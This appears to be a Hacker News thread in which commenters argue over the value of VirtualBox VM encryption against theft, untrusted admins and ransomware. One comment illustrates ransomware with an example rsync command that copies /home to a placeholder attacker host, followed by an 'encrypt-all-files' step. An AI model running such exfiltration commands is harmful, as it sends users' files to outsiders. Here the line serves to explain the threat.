Hacker News new | ask | show | jobs
by hsbauauvhabzb 1350 days ago
What value does vm encryption have? I’d rather encrypt my host and leave my vms unencrypted, given it would be possible to back door virtual box binaries given an unencrypted file system, or keylog keys assuming a remote breach.
5 comments
captainmuon 1350 days ago
You could have a VM where you do your secret stuff, and then shut it down when you are done and nobody can access it without the key.

It doesn't help against sophisticated keyloggers on the host (although I'd assume you would have a little bit of protection if you don't normally work as admin). It is more for the case that your PC gets stolen, or confiscated by authorities.

I think my PCs which shipped with full disc encryption are secure (Windows, macOS), but I never looked into it in detail. And I don't know for sure who could access it besides me (my job, Microsoft/Apple, law enforcement). My old shared desktop PC is definitely not encrypted. I only really have confidence in the Linux laptop I set up.

So for me it would be a privacy and comfort win to just have a small VM for sensitive stuff which is easy to encrypt.

link
synergy20 1350 days ago
I used to encrypt ubuntu or home directory, these days I just use virtualbox's vm encryption, worked well so far.

virtualbox over the years is very helpful to me and I'm grateful for it. The only problem I had is that it can not handle high throughput under stress(e.g. build full Android release leads to filesystem corruption), for 99% of the time it is very usable.

link
theevilsharpie 1350 days ago
Virtualbox VM encryption can be useful if the host hypervisor is compromised and the unauthorized party uploads data on disk that the host can trivially access (as is frequently the case with ransomware).
link
hsbauauvhabzb 1350 days ago
I don’t understand your comment at all. Ransomware can encrypt and encrypted virtual machine. If the host is compromised at a privilege level able to read or modify the VM, the vm is also implicitly compromised.
link
justsomehnguy 1350 days ago
> If the host is compromised at a privilege level able to read

Multi-user systems exists, compromise may be at user-level. Sure, if you have root/SYSTEM level access then all bets are off, but defense is like an ogre - it has layers.

link
hsbauauvhabzb 1350 days ago
In what scenario can you read/modify virtual box vms on a shared system in which you can’t read enough of a user profile to compromise an active user session to compromise encrypted credentials?

Can you name any scenarios where virtualbox is used in a multi user environment where bare metal shell/fs access is possible that are actually real world? If so I would be telling those entities their architecture is wrong and they would probably save on TCO by re-engineering things.

Defence in depth is a legitimate argument under some use cases, but your argument seems to be in favour of over engineering redundant or theoretical security controls rather than creating actual defensible environments.

link
justsomehnguy 1350 days ago
> In what scenario can you read/modify virtual box vms on a shared system in which you can’t read enough of a user profile to compromise an active user session to compromise encrypted credentials?

Any type of shared storage, eg NFS/SMB share or even a local disks/RAID for storing VMs.

Also:

>> When Oracle VM VirtualBox has just started up the encrypted VM cannot be opened and it stays inaccessible. Also, the encrypted VM stays inaccessible if it was just registered without a password or the password is incorrect. The user needs to provide the password using VirtualBox Manager or with the following VBoxManage command:

>> VBoxManage encryptvm uuid|vmname addpassword --password filename|- --password-id ID

https://www.virtualbox.org/manual/UserManual.html#vmencrypti...

link
theevilsharpie 1350 days ago
Ransomware typically does the rough equivalent of:

  rsync -az /home baddie@remote-files.example.com:/your-files/
  encrypt-all-files /home
If such a thing were to run on the host hypervisor, it would be reading an encrypted virtual disk file, not its unencrypted contents (since it would be encrypted at rest on the host).

I suppose it would be possible for the ransomware to be aware of Virtualbox and somehow manipulate Virtualbox's management plane to get access to unencrypted disk data, but unless you're the victim of a targeted ransomware attack, that's pretty unlikely.

link
Aachen 1350 days ago
You can also rot13 the files to the same effect. Works unless they specifically target your files and are aware of the encryption. Heck, it might be more "secure" because this practice would be more obscure than the encryption they built in.
link
sebazzz 1350 days ago
It is so you don't have to trust sysops, theoretically. The system admin won't be able to view the contents of the VM. Hyper-V supports this as well.
link
HyperSane 1350 days ago
It is a nice extra layer of protection and the encrypted VMs can be moved to another computer or backed up without losing the encryption
link